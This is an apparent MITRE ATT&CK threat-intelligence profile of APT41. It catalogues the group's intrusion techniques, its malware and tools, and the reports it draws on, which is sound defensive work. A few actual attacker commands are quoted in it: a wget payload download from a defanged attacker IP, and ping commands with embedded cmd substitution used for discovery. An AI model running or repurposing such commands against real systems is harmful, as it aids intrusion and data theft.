
G0096 APT41

APT41 is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially motivated operations. Active since at least 2012, APT41 has been observed targeting the healthcare, telecom, technology, and video game industries in 14 countries. APT41 overlaps at least partially with public reporting on groups including BARIUM and Winnti Group.[3][4]

ID: G0096
Associated Names: Wicked Panda
Version: 3.1
Created: 23 September 2019
Last Modified: 23 March 2023

Associated Group Descriptions

Name Description
Wicked Panda [1]

Techniques Used

Domain ID Name Use
enterprise T1134 Access Token Manipulation During C0017, APT41 used a ConfuserEx obfuscated BADPOTATO exploit to abuse named-pipe impersonation for local NT AUTHORITY\SYSTEM privilege escalation.[7]
enterprise T1098 Account Manipulation APT41 has added user accounts to the User and Admin groups.[3]
enterprise T1071 Application Layer Protocol -
enterprise T1071.001 Web Protocols APT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits.[5]

During C0017, APT41 ran wget http://103.224.80[.]44:8080/kernel to download malicious payloads.[7]

enterprise T1071.002 File Transfer Protocols APT41 used exploit payloads that initiate download via ftp.[5]
enterprise T1071.004 DNS APT41 used DNS for C2 communications.[3][4]
enterprise T1560 Archive Collected Data -
enterprise T1560.001 Archive via Utility APT41 created a RAR archive of targeted files for exfiltration.[3]
enterprise T1560.003 Archive via Custom Method During C0017, APT41 hex-encoded PII data prior to exfiltration.[7]
enterprise T1197 BITS Jobs APT41 used BITSAdmin to download and install payloads.[5][1]
enterprise T1547 Boot or Logon Autostart Execution -
enterprise T1547.001 Registry Run Keys / Startup Folder APT41 created and modified startup files for persistence.[3][4] APT41 added a registry key in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost to establish persistence for Cobalt Strike.[5]
enterprise T1110 Brute Force -
enterprise T1110.002 Password Cracking APT41 performed password brute-force attacks on the local admin account.[3]
enterprise T1059 Command and Scripting Interpreter -
enterprise T1059.001 PowerShell APT41 leveraged PowerShell to deploy malware families in victims’ environments.[3][5]
enterprise T1059.003 Windows Command Shell APT41 used cmd.exe /c to execute commands on remote machines.[3]

APT41 used a batch file to install persistence for the Cobalt Strike BEACON loader.[5]

During C0017, APT41 used cmd.exe to execute reconnaissance commands.[7]

enterprise T1059.004 Unix Shell APT41 executed file /bin/pwd in activity exploiting CVE-2019-19781 against Citrix devices.[5]
enterprise T1059.007 JavaScript During C0017, APT41 deployed JScript web shells on compromised systems.[7]
enterprise T1136 Create Account -
enterprise T1136.001 Local Account APT41 has created user accounts.[3]
enterprise T1543 Create or Modify System Process -
enterprise T1543.003 Windows Service APT41 modified legitimate Windows services to install malware backdoors.[3][4] APT41 created the StorSyncSvc service to provide persistence for Cobalt Strike.[5]
enterprise T1486 Data Encrypted for Impact APT41 used a ransomware called Encryptor RaaS to encrypt files on the targeted systems and provide a ransom note to the user.[3]
enterprise T1005 Data from Local System APT41 has uploaded files and data from a compromised host.[4]

During C0017, APT41 collected information related to compromised machines as well as Personally Identifiable Information (PII) from victim networks.[7]

enterprise T1001 Data Obfuscation -
enterprise T1001.003 Protocol Impersonation During C0017, APT41 frequently configured the URL endpoints of their stealthy passive backdoor LOWKEY.PASSIVE to masquerade as normal web application traffic on an infected server.[7]
enterprise T1074 Data Staged -
enterprise T1074.001 Local Data Staging During C0017, APT41 copied the local SAM and SYSTEM Registry hives to a staging directory.[7]
enterprise T1140 Deobfuscate/Decode Files or Information During C0017, APT41 used the DUSTPAN loader to decrypt embedded payloads.[7]
enterprise T1568 Dynamic Resolution -
enterprise T1568.002 Domain Generation Algorithms APT41 has used DGAs to change their C2 servers monthly.[3]
enterprise T1546 Event Triggered Execution -
enterprise T1546.008 Accessibility Features APT41 leveraged sticky keys to establish persistence.[3]
enterprise T1480 Execution Guardrails -
enterprise T1480.001 Environmental Keying APT41 has encrypted payloads using the Data Protection API (DPAPI), which relies on keys tied to specific user accounts on specific machines. APT41 has also environmentally keyed second-stage malware with an RC5 key derived in part from the infected system’s volume serial number.[6]
enterprise T1048 Exfiltration Over Alternative Protocol -
enterprise T1048.003 Exfiltration Over Unencrypted Non-C2 Protocol During C0017, APT41 exfiltrated victim data via DNS lookups by encoding it and prepending it as subdomains to the attacker-controlled domain.[7]
enterprise T1041 Exfiltration Over C2 Channel During C0017, APT41 used its Cloudflare services C2 channels for data exfiltration.[7]
enterprise T1567 Exfiltration Over Web Service During C0017, APT41 used Cloudflare services for data exfiltration.[7]
enterprise T1190 Exploit Public-Facing Application APT41 exploited CVE-2020-10189 against Zoho ManageEngine Desktop Central, and CVE-2019-19781 to compromise Citrix Application Delivery Controllers (ADC) and gateway devices.[5]

During C0017, APT41 exploited CVE-2021-44207 in the USAHerds application and CVE-2021-44228 in Log4j, as well as other .NET deserialization, SQL injection, and directory traversal vulnerabilities to gain initial access.[7]

enterprise T1203 Exploitation for Client Execution APT41 leveraged the following exploits in their operations: CVE-2012-0158, CVE-2015-1641, CVE-2017-0199, CVE-2017-11882, and CVE-2019-3396.[3]
enterprise T1068 Exploitation for Privilege Escalation During C0017, APT41 abused named pipe impersonation for privilege escalation.[7]
enterprise T1133 External Remote Services APT41 compromised an online billing/payment service using VPN access between a third-party service provider and the targeted payment service.[3]
enterprise T1008 Fallback Channels APT41 used the Steam community page as a fallback mechanism for C2.[3]
enterprise T1083 File and Directory Discovery APT41 has executed file /bin/pwd on exploited victims, perhaps to return architecture-related information.[5]
enterprise T1574 Hijack Execution Flow During C0017, APT41 established persistence by loading malicious libraries via modifications to the Import Address Table (IAT) within legitimate Microsoft binaries.[7]
enterprise T1574.001 DLL Search Order Hijacking APT41 has used search order hijacking to execute malicious payloads, such as Winnti RAT.[1]
enterprise T1574.002 DLL Side-Loading APT41 used legitimate executables to perform DLL side-loading of their malware.[3]
enterprise T1574.006 Dynamic Linker Hijacking APT41 has configured payloads to load via LD_PRELOAD.[1]
enterprise T1070 Indicator Removal -
enterprise T1070.001 Clear Windows Event Logs APT41 attempted to remove evidence of some of its activity by clearing Windows security and system events.[3]
enterprise T1070.003 Clear Command History APT41 attempted to remove evidence of some of its activity by deleting Bash histories.[3]
enterprise T1070.004 File Deletion APT41 deleted files from the system.[3]
enterprise T1105 Ingress Tool Transfer APT41 used certutil to download additional files.[5][1][4]

During C0017, APT41 downloaded malicious payloads onto compromised systems.[7]

enterprise T1056 Input Capture -
enterprise T1056.001 Keylogging APT41 used a keylogger called GEARSHIFT on a target system.[3]
enterprise T1036 Masquerading -
enterprise T1036.004 Masquerade Task or Service APT41 has created services to appear as benign system tools.[4]

During C0017, APT41 used SCHTASKS /Change to modify legitimate scheduled tasks to run malicious code.[7]

enterprise T1036.005 Match Legitimate Name or Location APT41 attempted to masquerade their files as popular anti-virus software.[3][4]

During C0017, APT41 used file names beginning with USERS, SYSUSER, and SYSLOG for DEADEYE, and changed KEYPLUG file extensions from .vmp to .upx, likely to avoid hunting detections.[7]

enterprise T1112 Modify Registry APT41 used a malware variant called GOODLUCK to modify the registry in order to steal credentials.[3][4]
enterprise T1104 Multi-Stage Channels APT41 used the storescyncsvc.dll BEACON backdoor to download a secondary backdoor.[5]
enterprise T1046 Network Service Discovery APT41 used a malware variant called WIDETONE to conduct port scans on specified subnets.[3]
enterprise T1135 Network Share Discovery APT41 used the net share command as part of network reconnaissance.[3][4]
enterprise T1027 Obfuscated Files or Information APT41 used VMProtected binaries in multiple intrusions.[5]

During C0017, APT41 broke malicious binaries, including DEADEYE and KEYPLUG, into multiple sections on disk to evade detection.[7]

enterprise T1027.002 Software Packing During C0017, APT41 used VMProtect to slow the reverse engineering of malicious binaries.[7]
enterprise T1588 Obtain Capabilities -
enterprise T1588.002 Tool APT41 has obtained and used tools such as Mimikatz, pwdump, PowerSploit, and Windows Credential Editor.[3]

For C0017, APT41 obtained publicly available tools such as YSoSerial.NET, ConfuserEx, and BadPotato.[7]

enterprise T1003 OS Credential Dumping -
enterprise T1003.001 LSASS Memory APT41 has used hashdump, Mimikatz, and the Windows Credential Editor to dump password hashes from memory and authenticate to other user accounts.[3][4]
enterprise T1003.002 Security Account Manager During C0017, APT41 copied the SAM and SYSTEM Registry hives for credential harvesting.[7]
enterprise T1566 Phishing -
enterprise T1566.001 Spearphishing Attachment APT41 sent spearphishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims.[3]
enterprise T1542 Pre-OS Boot -
enterprise T1542.003 Bootkit APT41 deployed Master Boot Record bootkits on Windows systems to hide their malware and maintain persistence on victim systems.[3]
enterprise T1055 Process Injection APT41 malware TIDYELF loaded the main WINTERLOVE component by injecting it into the iexplore.exe process.[3]
enterprise T1090 Proxy APT41 used a tool called CLASSFON to covertly proxy network communications.[3]

During C0017, APT41 used the Cloudflare CDN to proxy C2 traffic.[7]

enterprise T1021 Remote Services -
enterprise T1021.001 Remote Desktop Protocol APT41 used RDP for lateral movement.[3][1]
enterprise T1021.002 SMB/Windows Admin Shares APT41 has transferred implant files using Windows Admin Shares.[1]
enterprise T1496 Resource Hijacking APT41 deployed a Monero cryptocurrency mining tool in a victim’s environment.[3]
enterprise T1014 Rootkit APT41 deployed rootkits on Linux systems.[3][1]
enterprise T1053 Scheduled Task/Job -
enterprise T1053.005 Scheduled Task APT41 used a compromised account to create a scheduled task on a system.[3][1]

During C0017, APT41 used the following Windows scheduled tasks for DEADEYE dropper persistence on US state government networks: \Microsoft\Windows\PLA\Server Manager Performance Monitor, \Microsoft\Windows\Ras\ManagerMobility, \Microsoft\Windows\WDI\SrvSetupResults, and \Microsoft\Windows\WDI\USOShared.[7]

enterprise T1505 Server Software Component -
enterprise T1505.003 Web Shell During C0017, APT41 deployed JScript web shells through the creation of malicious ViewState objects.[7]
enterprise T1553 Subvert Trust Controls -
enterprise T1553.002 Code Signing APT41 leveraged code-signing certificates to sign malware when targeting both gaming and non-gaming organizations.[3][4]
enterprise T1195 Supply Chain Compromise -
enterprise T1195.002 Compromise Software Supply Chain APT41 gained access to production environments where they could inject malicious code into legitimate, signed files and widely distribute them to end users.[3]
enterprise T1218 System Binary Proxy Execution -
enterprise T1218.001 Compiled HTML File APT41 used compiled HTML (.chm) files for targeting.[3]
enterprise T1218.011 Rundll32 APT41 has used rundll32.exe to execute a loader.[1]
enterprise T1082 System Information Discovery During C0017, APT41 issued ping -n 1 ((cmd /c dir c:\|findstr Number).split()[-1]+ commands to find the volume serial number of compromised systems.[7]
enterprise T1016 System Network Configuration Discovery APT41 collected MAC addresses from victim machines.[3][4]

During C0017, APT41 used cmd.exe /c ping %userdomain% for discovery.[7]

enterprise T1049 System Network Connections Discovery APT41 has enumerated IP addresses of network resources and used the netstat command as part of network reconnaissance. The group has also used a malware variant, HIGHNOON, to enumerate active RDP sessions.[3][4]
enterprise T1033 System Owner/User Discovery APT41 used the WMIEXEC utility to execute whoami commands on remote machines.[3]

During C0017, APT41 used whoami to gather information from victim machines.[7]

enterprise T1569 System Services -
enterprise T1569.002 Service Execution APT41 used svchost.exe and Net to execute a system service installed to launch a Cobalt Strike BEACON loader.[5][4]
enterprise T1078 Valid Accounts APT41 used compromised credentials to log on to other systems.[3][1]
enterprise T1102 Web Service During C0017, APT41 used Cloudflare services for C2 communications.[7]
enterprise T1102.001 Dead Drop Resolver APT41 used legitimate websites for C2 through dead drop resolvers (DDR), including GitHub, Pastebin, and Microsoft TechNet.[3]

During C0017, APT41 used dead drop resolvers on two separate tech community forums for their KEYPLUG Windows-version backdoor; notably, APT41 updated the community forum posts frequently with new dead drop resolvers during the campaign.[7]

enterprise T1047 Windows Management Instrumentation APT41 used WMI in several ways, including for execution of commands via WMIEXEC as well as for persistence via PowerSploit.[3][4]

Software

ID Name References Techniques
S0073 ASPXSpy 3 Web Shell:Server Software Component
S0190 BITSAdmin 5 BITS Jobs Exfiltration Over Unencrypted Non-C2 Protocol:Exfiltration Over Alternative Protocol Ingress Tool Transfer Lateral Tool Transfer
S0069 BLACKCOFFEE 3 Windows Command Shell:Command and Scripting Interpreter File and Directory Discovery File Deletion:Indicator Removal Multi-Stage Channels Process Discovery Dead Drop Resolver:Web Service Bidirectional Communication:Web Service
S0160 certutil 5 Archive via Utility:Archive Collected Data Deobfuscate/Decode Files or Information Ingress Tool Transfer Install Root Certificate:Subvert Trust Controls
S0020 China Chopper 3 Web Protocols:Application Layer Protocol Password Guessing:Brute Force Windows Command Shell:Command and Scripting Interpreter Data from Local System File and Directory Discovery Timestomp:Indicator Removal Ingress Tool Transfer Network Service Discovery Software Packing:Obfuscated Files or Information Web Shell:Server Software Component
S0154 Cobalt Strike 5, 4 Sudo and Sudo Caching:Abuse Elevation Control Mechanism Bypass User Account Control:Abuse Elevation Control Mechanism Token Impersonation/Theft:Access Token Manipulation Make and Impersonate Token:Access Token Manipulation Parent PID Spoofing:Access Token Manipulation Domain Account:Account Discovery Web Protocols:Application Layer Protocol DNS:Application Layer Protocol Application Layer Protocol BITS Jobs Browser Session Hijacking Visual Basic:Command and Scripting Interpreter Python:Command and Scripting Interpreter JavaScript:Command and Scripting Interpreter PowerShell:Command and Scripting Interpreter Windows Command Shell:Command and Scripting Interpreter Windows Service:Create or Modify System Process Standard Encoding:Data Encoding Data from Local System Protocol Impersonation:Data Obfuscation Data Transfer Size Limits Deobfuscate/Decode Files or Information Asymmetric Cryptography:Encrypted Channel Symmetric Cryptography:Encrypted Channel Exploitation for Client Execution Exploitation for Privilege Escalation File and Directory Discovery Process Argument Spoofing:Hide Artifacts Disable or Modify Tools:Impair Defenses Timestomp:Indicator Removal Ingress Tool Transfer Keylogging:Input Capture Modify Registry Native API Network Service Discovery Network Share Discovery Non-Application Layer Protocol Indicator Removal from Tools:Obfuscated Files or Information Obfuscated Files or Information Office Template Macros:Office Application Startup Security Account Manager:OS Credential Dumping LSASS Memory:OS Credential Dumping Local Groups:Permission Groups Discovery Domain Groups:Permission Groups Discovery Process Discovery Process Hollowing:Process Injection Process Injection Dynamic-link Library Injection:Process Injection Protocol Tunneling Domain Fronting:Proxy Internal Proxy:Proxy Query Registry Reflective Code Loading Windows Remote Management:Remote Services SMB/Windows Admin Shares:Remote Services SSH:Remote Services Remote Desktop Protocol:Remote Services Distributed Component Object Model:Remote Services Remote System Discovery Scheduled Transfer Screen Capture Software Discovery Code Signing:Subvert Trust Controls Rundll32:System Binary Proxy Execution System Network Configuration Discovery System Network Connections Discovery System Service Discovery Service Execution:System Services Pass the Hash:Use Alternate Authentication Material Domain Accounts:Valid Accounts Local Accounts:Valid Accounts Windows Management Instrumentation
S1052 DEADEYE 7 Windows Command Shell:Command and Scripting Interpreter Deobfuscate/Decode Files or Information Execution Guardrails NTFS File Attributes:Hide Artifacts Masquerade Task or Service:Masquerading Native API Embedded Payloads:Obfuscated Files or Information Obfuscated Files or Information Scheduled Task/Job Rundll32:System Binary Proxy Execution Msiexec:System Binary Proxy Execution System Information Discovery System Network Configuration Discovery
S0021 Derusbi 3 Audio Capture Unix Shell:Command and Scripting Interpreter Symmetric Cryptography:Encrypted Channel Fallback Channels File and Directory Discovery File Deletion:Indicator Removal Timestomp:Indicator Removal Keylogging:Input Capture Non-Application Layer Protocol Non-Standard Port Process Discovery Dynamic-link Library Injection:Process Injection Query Registry Screen Capture Regsvr32:System Binary Proxy Execution System Information Discovery System Owner/User Discovery Video Capture
S0105 dsquery 7 Domain Account:Account Discovery Domain Trust Discovery Domain Groups:Permission Groups Discovery System Information Discovery
S0363 Empire 1 Bypass User Account Control:Abuse Elevation Control Mechanism Access Token Manipulation SID-History Injection:Access Token Manipulation Create Process with Token:Access Token Manipulation Domain Account:Account Discovery Local Account:Account Discovery LLMNR/NBT-NS Poisoning and SMB Relay:Adversary-in-the-Middle Web Protocols:Application Layer Protocol Archive Collected Data Automated Collection Automated Exfiltration Shortcut Modification:Boot or Logon Autostart Execution Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution Security Support Provider:Boot or Logon Autostart Execution Browser Information Discovery Clipboard Data PowerShell:Command and Scripting Interpreter Windows Command Shell:Command and Scripting Interpreter Command and Scripting Interpreter Domain Account:Create Account Local Account:Create Account Windows Service:Create or Modify System Process Credentials from Web Browsers:Credentials from Password Stores Group Policy Modification:Domain Policy Modification Domain Trust Discovery Local Email Collection:Email Collection Asymmetric Cryptography:Encrypted Channel Accessibility Features:Event Triggered Execution Exfiltration Over C2 Channel Exfiltration to Code Repository:Exfiltration Over Web Service Exfiltration to Cloud Storage:Exfiltration Over Web Service Exploitation for Privilege Escalation Exploitation of Remote Services File and Directory Discovery Group Policy Discovery Path Interception by Search Order Hijacking:Hijack Execution Flow Dylib Hijacking:Hijack Execution Flow Path Interception by Unquoted Path:Hijack Execution Flow DLL Search Order Hijacking:Hijack Execution Flow Path Interception by PATH Environment Variable:Hijack Execution Flow Timestomp:Indicator Removal Ingress Tool Transfer Keylogging:Input Capture Credential API Hooking:Input Capture Native API Network Service Discovery Network Share Discovery Network Sniffing Command Obfuscation:Obfuscated Files or Information LSASS Memory:OS Credential Dumping Process Discovery Process Injection Distributed Component Object Model:Remote Services SSH:Remote Services Scheduled Task:Scheduled Task/Job Screen Capture Security Software Discovery:Software Discovery Kerberoasting:Steal or Forge Kerberos Tickets Silver Ticket:Steal or Forge Kerberos Tickets Golden Ticket:Steal or Forge Kerberos Tickets System Information Discovery System Network Configuration Discovery System Network Connections Discovery System Owner/User Discovery Service Execution:System Services MSBuild:Trusted Developer Utilities Proxy Execution Credentials In Files:Unsecured Credentials Private Keys:Unsecured Credentials Pass the Hash:Use Alternate Authentication Material Video Capture Bidirectional Communication:Web Service Windows Management Instrumentation
S0095 ftp 5 Exfiltration Over Unencrypted Non-C2 Protocol:Exfiltration Over Alternative Protocol Ingress Tool Transfer Lateral Tool Transfer
S0032 gh0st RAT 3 Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution Command and Scripting Interpreter Windows Service:Create or Modify System Process Standard Encoding:Data Encoding Deobfuscate/Decode Files or Information Fast Flux DNS:Dynamic Resolution Symmetric Cryptography:Encrypted Channel Encrypted Channel DLL Side-Loading:Hijack Execution Flow Clear Windows Event Logs:Indicator Removal File Deletion:Indicator Removal Ingress Tool Transfer Keylogging:Input Capture Modify Registry Native API Non-Application Layer Protocol Process Discovery Process Injection Query Registry Screen Capture Shared Modules Rundll32:System Binary Proxy Execution System Information Discovery Service Execution:System Services
S0100 ipconfig 4 System Network Configuration Discovery
S1051 KEYPLUG 7 Web Protocols:Application Layer Protocol Deobfuscate/Decode Files or Information Asymmetric Cryptography:Encrypted Channel Non-Application Layer Protocol Obfuscated Files or Information Proxy System Time Discovery Dead Drop Resolver:Web Service
S0443 MESSAGETAP 8, 1 Archive via Custom Method:Archive Collected Data Automated Collection Local Data Staging:Data Staged Deobfuscate/Decode Files or Information File and Directory Discovery File Deletion:Indicator Removal Network Sniffing System Network Connections Discovery
S0002 Mimikatz 3, 4 SID-History Injection:Access Token Manipulation Account Manipulation Security Support Provider:Boot or Logon Autostart Execution Credentials from Password Stores Windows Credential Manager:Credentials from Password Stores Credentials from Web Browsers:Credentials from Password Stores LSASS Memory:OS Credential Dumping DCSync:OS Credential Dumping Security Account Manager:OS Credential Dumping LSA Secrets:OS Credential Dumping Rogue Domain Controller Steal or Forge Authentication Certificates Silver Ticket:Steal or Forge Kerberos Tickets Golden Ticket:Steal or Forge Kerberos Tickets Private Keys:Unsecured Credentials Pass the Ticket:Use Alternate Authentication Material Pass the Hash:Use Alternate Authentication Material
S0039 Net 3 Domain Account:Account Discovery Local Account:Account Discovery Local Account:Create Account Domain Account:Create Account Network Share Connection Removal:Indicator Removal Network Share Discovery Password Policy Discovery Local Groups:Permission Groups Discovery Domain Groups:Permission Groups Discovery SMB/Windows Admin Shares:Remote Services Remote System Discovery System Network Connections Discovery System Service Discovery Service Execution:System Services System Time Discovery
S0104 netstat 3 System Network Connections Discovery
S0385 njRAT 3 Web Protocols:Application Layer Protocol Application Window Discovery Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution Windows Command Shell:Command and Scripting Interpreter PowerShell:Command and Scripting Interpreter Credentials from Web Browsers:Credentials from Password Stores Standard Encoding:Data Encoding Data from Local System Fast Flux DNS:Dynamic Resolution Exfiltration Over C2 Channel File and Directory Discovery Disable or Modify System Firewall:Impair Defenses Clear Persistence:Indicator Removal File Deletion:Indicator Removal Ingress Tool Transfer Keylogging:Input Capture Modify Registry Native API Non-Standard Port Compile After Delivery:Obfuscated Files or Information Obfuscated Files or Information Peripheral Device Discovery Process Discovery Query Registry Remote Desktop Protocol:Remote Services Remote System Discovery Replication Through Removable Media Screen Capture System Information Discovery System Owner/User Discovery Video Capture
S0097 Ping 3, 4 Remote System Discovery
S0013 PlugX 3 DNS:Application Layer Protocol Web Protocols:Application Layer Protocol Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution Windows Command Shell:Command and Scripting Interpreter Windows Service:Create or Modify System Process Deobfuscate/Decode Files or Information Symmetric Cryptography:Encrypted Channel File and Directory Discovery Hidden Files and Directories:Hide Artifacts DLL Side-Loading:Hijack Execution Flow DLL Search Order Hijacking:Hijack Execution Flow Ingress Tool Transfer Keylogging:Input Capture Masquerade Task or Service:Masquerading Match Legitimate Name or Location:Masquerading Modify Registry Native API Network Share Discovery Non-Application Layer Protocol Obfuscated Files or Information Process Discovery Query Registry Screen Capture System Network Connections Discovery MSBuild:Trusted Developer Utilities Proxy Execution System Checks:Virtualization/Sandbox Evasion Dead Drop Resolver:Web Service
S0194 PowerSploit 3 Access Token Manipulation Local Account:Account Discovery Audio Capture Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution Security Support Provider:Boot or Logon Autostart Execution PowerShell:Command and Scripting Interpreter Windows Service:Create or Modify System Process Windows Credential Manager:Credentials from Password Stores Data from Local System Domain Trust Discovery DLL Search Order Hijacking:Hijack Execution Flow Path Interception by Unquoted Path:Hijack Execution Flow Path Interception by Search Order Hijacking:Hijack Execution Flow Path Interception by PATH Environment Variable:Hijack Execution Flow Keylogging:Input Capture Indicator Removal from Tools:Obfuscated Files or Information Command Obfuscation:Obfuscated Files or Information LSASS Memory:OS Credential Dumping Process Discovery Dynamic-link Library Injection:Process Injection Query Registry Reflective Code Loading Scheduled Task:Scheduled Task/Job Screen Capture Kerberoasting:Steal or Forge Kerberos Tickets Credentials in Registry:Unsecured Credentials Group Policy Preferences:Unsecured Credentials Windows Management Instrumentation
S0006 pwdump 3 Security Account Manager:OS Credential Dumping
S0112 ROCKBOOT 3 Bootkit:Pre-OS Boot
S0596 ShadowPad 3, 9 File Transfer Protocols:Application Layer Protocol DNS:Application Layer Protocol Web Protocols:Application Layer Protocol Non-Standard Encoding:Data Encoding Deobfuscate/Decode Files or Information Domain Generation Algorithms:Dynamic Resolution Indicator Removal Ingress Tool Transfer Modify Registry Non-Application Layer Protocol Fileless Storage:Obfuscated Files or Information Obfuscated Files or Information Process Discovery Process Injection Dynamic-link Library Injection:Process Injection Scheduled Transfer System Information Discovery System Network Configuration Discovery System Owner/User Discovery System Time Discovery
S0430 Winnti for Linux 1 Web Protocols:Application Layer Protocol Deobfuscate/Decode Files or Information Symmetric Cryptography:Encrypted Channel Ingress Tool Transfer Non-Application Layer Protocol Obfuscated Files or Information Rootkit Traffic Signaling
S0412 ZxShell 3 Create Process with Token:Access Token Manipulation Web Protocols:Application Layer Protocol File Transfer Protocols:Application Layer Protocol Windows Command Shell:Command and Scripting Interpreter Local Account:Create Account Windows Service:Create or Modify System Process Data from Local System Endpoint Denial of Service Exploit Public-Facing Application File and Directory Discovery Disable or Modify Tools:Impair Defenses Disable or Modify System Firewall:Impair Defenses File Deletion:Indicator Removal Clear Windows Event Logs:Indicator Removal Ingress Tool Transfer Credential API Hooking:Input Capture Keylogging:Input Capture Modify Registry Native API Network Service Discovery Non-Standard Port Process Discovery Dynamic-link Library Injection:Process Injection Proxy Query Registry Remote Desktop Protocol:Remote Services VNC:Remote Services Screen Capture Rundll32:System Binary Proxy Execution System Information Discovery System Owner/User Discovery System Service Discovery Service Execution:System Services Video Capture

References

  1. Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.
  2. FireEye. (2019). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.
  3. Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.
  4. Rostovcev, N. (2021, June 10). Big airline heist: APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.
  5. Glyer, C., et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020.
  6. Carr, N. (2019, October 30). Nick Carr Status Update APT41 Environmental Keying. Retrieved June 23, 2020.
  7. Brown, R., Ta, V., Bienstock, D., Ackerman, G., Wolfram, J. (2022, March 8). Does This Look Infected? A Summary of APT41 Targeting U.S. State Governments. Retrieved July 8, 2022.
  8. Leong, R., Perez, D., Dean, T. (2019, October 31). MESSAGETAP: Who’s Reading Your Text Messages? Retrieved May 11, 2020.
  9. Insikt Group. (2021, February 28). China-Linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions. Retrieved March 22, 2021.